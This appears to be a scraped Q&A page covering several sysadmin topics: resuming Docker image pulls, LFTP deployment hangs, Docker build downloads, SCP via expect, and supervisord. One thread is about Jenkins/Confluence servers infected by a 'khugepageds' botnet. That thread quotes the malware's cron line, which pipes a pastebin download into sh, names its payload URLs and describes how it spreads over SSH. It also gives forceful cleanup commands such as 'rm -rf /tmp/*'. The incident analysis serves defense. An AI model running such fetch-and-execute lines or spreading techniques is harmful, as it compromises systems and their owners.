Docker: How to resume downloading an image when interrupted?

How can I resume a pull when disconnected? The pull process always starts from the beginning every time I run docker pull some-image again after a disconnect. My connection is so unstable that even downloading just a 100MB image takes very long and almost always fails. So it is almost impossible for me to pull a bigger image. How can I resume the pull process?

Update:
The pull process will now automatically resume based on which layers have already been downloaded. This was implemented with https://github.com/moby/moby/pull/18353.
Old:
There is no resume feature yet. However, there are discussions around this feature being implemented with Docker's download manager.

Docker's released code isn't as up to date as the moby development repository on GitHub. People have been reporting issues relating to this for several years. I tried manually applying several patches which aren't upstream yet, and none of them worked decently.
The GitHub repository for moby (Docker's development repo) has a script called download-frozen-image-v2.sh. This script uses bash, curl, and other tools such as command-line JSON interpreters. It retrieves a Docker token and then downloads all of the layers to a local directory. You can then use docker load to import them into your local Docker installation.
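For reference, the typical workflow looks roughly like this (a sketch; the raw URL, image name and tag are only examples, and the script's own usage output is authoritative):
# fetch the script from the moby repository
curl -fsSL -o download-frozen-image-v2.sh https://raw.githubusercontent.com/moby/moby/master/contrib/download-frozen-image-v2.sh
chmod +x download-frozen-image-v2.sh
# download all layers of an image into a local directory
./download-frozen-image-v2.sh ./ubuntu-image ubuntu:20.04
# pack the directory and load it into the local Docker daemon
tar -cC ./ubuntu-image . | docker load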
It does not handle resuming well, though. There was a comment in the script noting that 'curl -C' wasn't working. I tracked down and fixed this problem. I made a modification which first retrieves a ".headers" file (the initial request has always returned a 302 while I've been monitoring it), and then retrieves the final URL with curl (+ resume support) into the layer tar file. The calling function also has to loop to retrieve a valid token, which unfortunately only lasts about 30 minutes.
It loops this process until it receives a 416, indicating that no resume is possible because the requested ranges have already been fulfilled. It also verifies the size against a curl header retrieval. I have been able to retrieve all the images I needed using this modified script. Docker has many more layers of code involved in retrieval, and remote control processes (the Docker client) which make it harder to control, and they viewed this issue as only affecting some people on bad connections.
I hope this script can help you as much as it has helped me:
Changes:
The fetch_blob function uses a temporary file for its first connection. It then retrieves the 30x HTTP redirect from this. It attempts a header retrieval on the final URL and checks whether the local copy already has the full file; otherwise, it begins a resuming curl operation. The calling function, which passes it a valid token, has a loop around retrieving a token and calling fetch_blob, which ensures the full file is obtained.
The only other variation is a bandwidth-limit variable which can be set at the top of the script, or via a "BW:10" command-line parameter. I needed this to keep my connection usable for other operations.
Click here for the modified script.
In the future it would be nice if Docker's internal client performed resuming properly. Increasing the token's validity period would also help tremendously.
Brief views of change code:
#loop until FULL_FILE is set in fetch_blob.. this is for bad/slow connections
while [ "$FULL_FILE" != "1" ]; do
    local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
    fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress
    sleep 1
done
Another section from fetch_blob:
while :; do
    #if the file already exists.. we will be resuming..
    if [ -f "$targetFile" ]; then
        #getting current size of file we are resuming
        CUR=`stat --printf="%s" "$targetFile"`
        #use curl to get headers to find content-length of the full file
        LEN=`curl -I -fL "${curlArgs[@]}" "$blobRedirect" | grep content-length | cut -d" " -f2`
        #if we already have the entire file... lets stop curl from erroring with 416
        if [ "$CUR" == "${LEN//[!0-9]/}" ]; then
            FULL_FILE=1
            break
        fi
    fi
    HTTP_CODE=`curl -w %{http_code} -C - --tr-encoding --compressed --progress-bar -fL "${curlArgs[@]}" "$blobRedirect" -o "$targetFile"`
    if [ "$HTTP_CODE" == "403" ]; then
        #token expired so the server stopped allowing us to resume, lets return without setting FULL_FILE and itll restart this func w new token
        FULL_FILE=0
        break
    fi
    if [ "$HTTP_CODE" == "416" ]; then
        FULL_FILE=1
        break
    fi
    sleep 1
done

Try this
ps -ef | grep docker
Get the PIDs of all the docker pull commands and do a kill -9 on them. Once they are killed, re-issue the docker pull <image>:<tag> command.
This worked for me!
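If you prefer a one-liner for the kill step, something like this should work (a sketch; double-check the matched PIDs before sending kill -9):
# find and kill any stuck `docker pull` processes
ps -ef | grep '[d]ocker pull'
kill -9 $(pgrep -f 'docker pull')
# then start the pull again
docker pull <image>:<tag>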

Related

Jenkins High CPU Usage Khugepageds

A command called khugepageds is using 98 to 100% of the CPU at times (shown in a screenshot that accompanied the question).
I tried to find out how Jenkins uses this command, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, the CPU usage of course goes down, but once Jenkins restarts it's back up again.
Has anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron process on the system; it will keep trying to regain escalated access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, and restart the VM.
The vulnerability adds unwanted executables to the /tmp folder and tries to access other machines via SSH.
It also added a cron process on the system; be sure to remove that as well.
Also check the ~/.ssh folder (known_hosts and authorized_keys) for any suspicious SSH public keys. The attacker can add their own SSH keys to keep access to your system.
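A few inspection commands for the points above (a sketch; it assumes the service account is called jenkins and its home is /var/lib/jenkins, so adjust paths to your setup):
crontab -l -u jenkins                       # look for curl/wget pastebin entries
ls -la /tmp                                 # look for kerberods or other unknown executables
grep pastebin /var/log/syslog               # traces of the dropper script
cat /var/lib/jenkins/.ssh/authorized_keys   # any SSH keys you did not add yourself
cat /var/lib/jenkins/.ssh/known_hosts       # hosts the agent may have tried to spread to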
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in the frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
    return 403;
}
Restart Confluence.
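To verify the block, you can hit the path through the frontend and expect a 403 (a sketch; confluence.example.com is a placeholder for your own hostname):
curl -s -o /dev/null -w "%{http_code}\n" https://confluence.example.com/rest/tinymce/1/macro/preview
# expected output: 403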
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/virus/botnet agents, downloads and spawns the binary from /tmp/kerberods, and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (size 3395072, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does. It looks like a botnet controller.
It seems like the same vulnerability. Try looking in the syslog (/var/log/syslog, not the Jenkins log) for something like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find that, try stopping Jenkins, clearing the /tmp dir, and killing all PIDs started by the jenkins user.
If the CPU usage then drops, update to the latest LTS version of Jenkins. After it starts, update all the plugins in Jenkins.
A solution that works (because the cron file just gets recreated otherwise) is to empty jenkins' cron file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in.
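A minimal sketch of that approach, assuming a Debian-style crontab location (/var/spool/cron/crontabs/jenkins; RHEL-style systems use /var/spool/cron/jenkins instead):
CRONFILE=/var/spool/cron/crontabs/jenkins   # adjust for your distro
crontab -r -u jenkins        # drop the malicious entries
: > "$CRONFILE"              # recreate the cron file empty
chown root:root "$CRONFILE"  # change the ownership as described above
chattr +i "$CRONFILE"        # make the file immutable (chattr -i to undo later)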
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since every place I read about this error the suggested solution was to increase memory.
The problem was solved with HeffZilla's solution.

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and a GitLab Runner CI setup to deploy (synchronize) a bunch of JSON files on a server using LFTP. This job, however, seems to "freeze" for a few minutes roughly every 10 files. Having to synchronize roughly 400 files sometimes, this job simply crashes because it can take more than an hour to complete. The JSON files are all 1KB. Neither the source nor the target server should have any firewall rate-limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in order to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD@$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
The job is run in Docker, using this container to deploy everything. What could cause this?
For those of you coming from Google: we had the exact same setup. To get LFTP to stop hanging when running in Docker or some other CI, you can use this command:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so LFTP won't wait forever or get into a continuous loop when it can't execute a command. This should speed things along.
It makes sure we are using SSL/TLS. If you don't need this, remove those options.
It synchronizes one folder to the new location. The options -Renv are explained in the LFTP man page: https://lftp.yar.ru/lftp-man.html
Lastly, in the GitLab CI I set the job to retry if it fails. This will spin up a new Docker instance that gets around any open file or connection limitations. The above LFTP command will run again, but since we are using the -n flag it will only move over the files that were missed on the first attempt. This gets everything moved over without hassle. You can read more about CI job retries here: https://docs.gitlab.com/ee/ci/yaml/#retry
Have you looked at using rsync instead? I'm fairly sure you would benefit from the incremental copying of files, as opposed to copying the entire set over each time.
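A hedged sketch of what that could look like, reusing the variables from the question (sshpass is an extra dependency for password authentication in CI; SSH keys would be cleaner):
sshpass -p "$DEVELOPMENT_DEPLOY_PASSWORD" \
  rsync -avz -e "ssh -p $DEVELOPMENT_DEPLOY_PORT -o StrictHostKeyChecking=no" \
  --include='*/' --include='*.json' --exclude='*' \
  ./configuration_files/ \
  "$DEVELOPMENT_DEPLOY_USER@$DEVELOPMENT_DEPLOY_HOST:configuration/configuration_files/"
Only files that changed since the last run are transferred, which avoids re-uploading all 400 JSON files every time.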

Move file downloaded in Dockerfile to harddrive

First off, I really lack a lot of knowledge regarding Docker itself and its structure. I know that it'd be way more beneficial to learn the basics first, but I do require this to work in order to move on to other things for now.
So within a Dockerfile I installed wget and used it to download a file from a website; authentication and download are successful. However, when I later try to move said file it can't be found, and it doesn't show up in e.g. Explorer either (the path was specified).
I thought it might have something to do with RUN and how it executes the wget command; I read that the container ID can be used to copy files to the hard drive, but how would I do that from within a Dockerfile?
RUN wget -P ./path/to/somewhere http://something.com/file.txt --username xyz --password bluh
ADD ./path/to/somewhere/file.txt /mainDirectory
The download is shown and log-in is successful, but as I mentioned I am having trouble using that file later on, as it's not located on the hard drive. Probably a basic error, but I'd really appreciate some input that might lead to a solution.
Obviously the error is produced when trying to execute ADD, as there is no file to move. I am trying to find a way to mount a volume in order to store it, but so far in vain.
Edit:
Though the question is similar to the "move to harddrive" one, I am searching for ways to get the ID of the container created within the Dockerfile in order to move the file; while that thread provides such answers, I haven't had any luck using them within the Dockerfile itself.
Short answer is that it's not possible.
The Dockerfile builds an image, which you can run as a short-lived container. During the build, you don't have (write) access to the host and its file system. Which kinda makes sense, since you want to build an immutable image from which to run ephemeral containers.
What you can do is run a container and mount a path from your host as a volume into the container. This is the only way you can share files between the host and a container.
Here is an example how you could do this with the sherylynn/wget image:
docker run -v /path/on/host:/path/in/container sherylynn/wget wget -O /path/in/container/file http://my.url.com
The -v HOST:CONTAINER parameter allows you to specify a path on the host that is mounted inside the container at a specified location.
For wget, I would prefer -O over -P when downloading a single file, since it makes it really explicit where your download ends up. When you point -O to the location of the volume, the downloaded file ends up on the host system (in the folder you mounted).
Since I have no idea what your image or your environment looks like, you might need to tweak one or two things to work well with your own image. As a general recommendation: For basic commands like wget or curl, you can find pre-made images on Docker Hub. This can be quite useful when you need to set up a Continuous Integration pipeline or so, where you want to use wget or curl but can't execute it directly.
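To make that concrete, a small sketch of the volume approach using the sherylynn/wget image from the example above (the URL and paths are placeholders):
mkdir -p "$PWD/downloads"
docker run --rm -v "$PWD/downloads:/path/in/container" sherylynn/wget wget -O /path/in/container/file.txt http://my.url.com
ls "$PWD/downloads"   # file.txt now exists on the host hard drive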
Use wget -O instead of -P to download to a specific file name,
e.g.:
RUN wget -O /tmp/new_file.txt --user xyz --password bluh http://something.com/new_file.txt
Thanks

Updating IOS's via SCP in bash with expect

Good day. I am attempting to create/run a script that will allow me to send an updated IOS from a server to my network devices. The following code works when I put in a manual IP address right before the ":flash" command.
#!/usr/bin/expect
set IOSroot "/xxxxx/xxx/c3750e-universalk9-mz.150-2.SE10a.bin"
set pw xxxxxxxxxxxxxxxxxxx
spawn scp $IOSroot 1.1.1.1:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
expect "TACACS Password:"
send "$pw\r"
interact
The code there works great and as expected. The issue arises when I try to use a file called "ioshost" with a list of IP's and use that within this script to get some automation. I have tried various things to get this to work. Some of them are as follows:
Setting variables:
IPHosts=$(cat ioshost)
set IPHost 'cat ioshost'
Along with trying to use a while read loop:
while read line; do
spawn scp $IOSroot $line:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
done < ioshost
None of these seem to work and I am looking for guidance. Please note I understand that setting a password is not best practice, but setting up RSA keys as mentioned in other articles is not allowed, so I am forced to do it this way.
Thank you for your time.
You can use one Expect script and one Bash script.
First update your Expect script a bit:
#!/usr/bin/expect
set IOSroot "/xxxxx/xxx/c3750e-universalk9-mz.150-2.SE10a.bin"
set pw xxxxxxxxxxxxxxxxxxx
spawn scp $IOSroot [lindex $argv 0]:flash:/c3750e-universalk9-mz.150-2.SE10a.bin
# ^^^^^^^^^^^^^^^^
expect "TACACS Password:"
send "$pw\r"
interact
Then write a simple Bash for loop:
for host in $(<ioshost); do
expect /your/script.exp $host
done
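If the host file might contain blank lines, or you prefer the while read approach from the question, this variant works too (a sketch, assuming the parameterised Expect script above is saved as /your/script.exp):
#!/bin/bash
# feed each IP from ioshost to the Expect script
while IFS= read -r host; do
    [ -z "$host" ] && continue   # skip blank lines
    expect /your/script.exp "$host"
done < ioshost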

Docker - Handling multiple services in a single container

I would like to start two different services in my Docker container and exit the container as soon as one of them exits. I looked at supervisor, but I can't find out how to get it to quit as soon as one of the managed applications exits. It tries to restart them up to three times (the default setting) and then just sits there doing nothing. Is supervisor able to do this, or is there another tool for this? A bonus would be if there were also a way to let both managed programs write to stdout, tagged with their application name, e.g.:
[Program 1] Some output
[Program 2] Some other output
[Program 1] Output again
Since you asked if there was another tool: we designed and wrote a powerful replacement for supervisord that is designed specifically for Docker. It automatically terminates when all applications quit, has special service settings to control this behavior, and redirects stdout with tagged, syslog-compatible output lines. It's open source and being used in production.
Here is a quick start for Docker: http://garywiz.github.io/chaperone/guide/chap-docker-simple.html
There is also a complete set of tested base-images which are a good example at: https://github.com/garywiz/chaperone-docker, but these might be overkill and the earlier quickstart may do the trick.
I found solutions to both of my requirements by reading through the docs some more.
Exit supervisord on application exit
This can be achieved by using a custom eventlistener. I had to add the following segment into my supervisord configuration file:
[eventlistener:shutdownevent]
command=/shutdownhandler.sh
events=PROCESS_STATE_EXITED
supervisord will start the referenced script and, upon the given event being triggered (PROCESS_STATE_EXITED fires after one of the managed programs exits and is not restarted automatically), will send a line containing data about the event on the script's stdin.
The referenced shutdownhandler-script contains:
#!/bin/bash
while :
do
    echo -en "READY\n"
    read line
    kill $(cat /supervisord.pid)
    echo -en "RESULT 2\nOK"
done
The script has to indicate that it is ready by sending "READY\n" on its stdout, after which it may receive an event data line on its stdin. For my use case, upon receipt of a line (meaning one of the managed programs has exited), a SIGTERM is sent to the supervisord process, found via the PID it leaves in its pid file (situated in the root directory by default). For technical completeness, I also included a positive answer for the eventlistener, though that one should never matter.
Tagged output on stdout
I did this by simply starting a tail process in the background before starting supervisord, tailing the program's output log and piping the lines through ts (from the moreutils package) to prepend a tag. This way it shows up via docker logs with an easy way to see which program actually wrote the line.
tail -fn0 /var/log/supervisor/program1.log | ts '[Program 1]' &
